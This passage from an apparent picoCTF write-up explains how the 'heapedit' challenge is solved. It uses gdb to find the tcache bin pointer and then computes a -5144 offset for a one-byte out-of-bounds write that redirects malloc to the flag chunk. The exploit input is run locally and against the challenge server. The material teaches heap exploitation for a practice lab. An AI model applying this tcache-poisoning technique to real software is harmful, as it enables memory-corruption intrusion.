      0x7ffff7ffe000     0x7ffff7fff000     0x1000        0x0 
      0x7ffffffde000     0x7ffffffff000    0x21000        0x0 [stack]

The heap lives between 0x602000 and 0x623000. As seen above, the last chunk inserted into the tcache is at 0x603890. If the tcache bin ptr lives in the heap, we should find somewhere between 0x602000 and 0x623000 the value 0x603890. With gdb, we can search for it.

gef➤  find 0x602000, 0x623000, 0x603890
0x602088
warning: Unable to access 7029 bytes of target memory at 0x62148c, halting search.
1 pattern found.

The tcache bin ptr is stored in the heap at 0x602088. We can also verify this.

gef➤  x/x 0x602088
0x602088:       0x0000000000603890

To make our exploit work, we need to change the address of the tcache bin ptr (at 0x602088) from pointing to the random_data chunk (at 0x603890) to pointing to the flag_data chunk (at 0x603800). Luckily, this means changing one byte from 0x90 to 0x00.

Let’s first validate our understanding manually and change the address via gdb.

gef➤  set {void*}0x602088 = 0x0000000000603800
gef➤  x 0x602088
0x602088:       0x0000000000603800
gef➤  heap bins tcache
──────── Tcachebins for arena 0x7ffff7dcfc40 ────────
Tcachebins[idx=7, size=0x90] count=2  ←  Chunk(addr=0x603800, size=0x90, flags=PREV_INUSE) 

We first update the pointer with set, spot-check that the value is really overwritten and then check with heap bins tcache the new layout of the tcache. As we can see, we now only have one value in it. Eagled eyed folks might notice the count=2. The metadata is now screwed up, but the program only makes one more malloc, so it does not matter here. When running the program now, it outputs the flag, independent of what inputs we give it.

gef➤  c
Continuing.
You may edit one byte in the program.
Address: AAAA
Value: lag is: iamaflag

Perfect! We validated our approach. Next up, we need to be able to execute this from the command line without gdb.

Generalize Exploit

Now that we know that we can overwrite a single byte to get the flag, we need to figure out how to overwrite that byte with just the inputs to the program (address and new byte). Let’s first have a look at the relevant code again.

  address = 0;
  new_byte = '\0';
  puts("You may edit one byte in the program.");
  printf("Address: ");
  __isoc99_scanf("%d",&address); // (10)
  printf("Value: ");
  __isoc99_scanf(" %c",&new_byte); // (11)
  first_malloc_data[address] = new_byte;
  last_malloc = (char **)malloc(0x80);
  puts((char *)(last_malloc + 2)); // (12)

We give it an address (from now on, I will call it an offset, as it is not an address, it is an offset!) and a new byte. It will then write the new byte to first_malloc_data[address].

This is very convenient for us. Normally, in a heap exploit, we would need a leak of a heap address as the heap will not always be placed at the same address. Is it hopeless? Or course not! While the address (and the position of the heap) is random, the position of chunks inside the heap is stable. If a chunk is 0x1337 from another address in the heap, it will always be 0x1337 from that other address, in each and every run. If we can leak an address in the heap — a heap address leak —, we can simply calculate the offset locally. The offset will be correct no matter where the program is run. The first_malloc_data acts as a free heap address leak.

The heap looks something like this:

┌──────────────────┐
│  start of heap   │
├──────────────────┤
│       ...        │
├──────────────────┤
│  tcache bin ptr  │
├──────────────────┤ ▲
│                  │ │
│       ...        │ │offset
│                  │ │
├──────────────────┤ ▼
│first_malloc_data │
├──────────────────┤
│                  │
│                  │
│       ...        │
│                  │
│                  │
│                  │
│                  │
├──────────────────┤
│   end of heap    │
└──────────────────┘

To write the byte at to the correct location in the heap, we need to know the offset between first_malloc_data and the tcache bin ptr, so we can use that as the address input to the program. We know where tcache bin ptr is stored (0x602088), but we also need the address of first_malloc_data. According to the disassembly (either in ghidra or gdb) it is stored in rbp-0x98 (for example visible in the gdb disassembly at main+212). Getting the address with gdb:

gef➤  p *((void**)($rbp-0x98))
$10 = (void *) 0x6034a0

Now we can calculate the offset between the two.

gef➤  p/d 0x602088-0x6034a0
$12 = -5144

So we subtract 5144 to get from the address of first_malloc_data to the to the address oftcache bin ptr. To change the pointer from 0x603890 to 0x603800, we need to overwrite the last byte. As we are running on x64, which uses LSB, it will be the first byte at that address (as the value 0x603890 on a 64bit LSB system will be stored as 0x9038600000000000). The inputs to the program should result in first_malloc_data[-5144] = '0x00' , or -5144 for the address, and 0x00 for the new byte.

$ echo "-5144\n\x00\n\n" |  ./heapedit
You may edit one byte in the program.
Address: Value: lag is: iamaflag

And we get the flag!

We can run the same thing remotely as well.

$ echo "-5144\n\x00\n\n" |  nc mercury.picoctf.net 31153
You may edit one byte in the program.
Address: Value: lag is: picoCTF{...}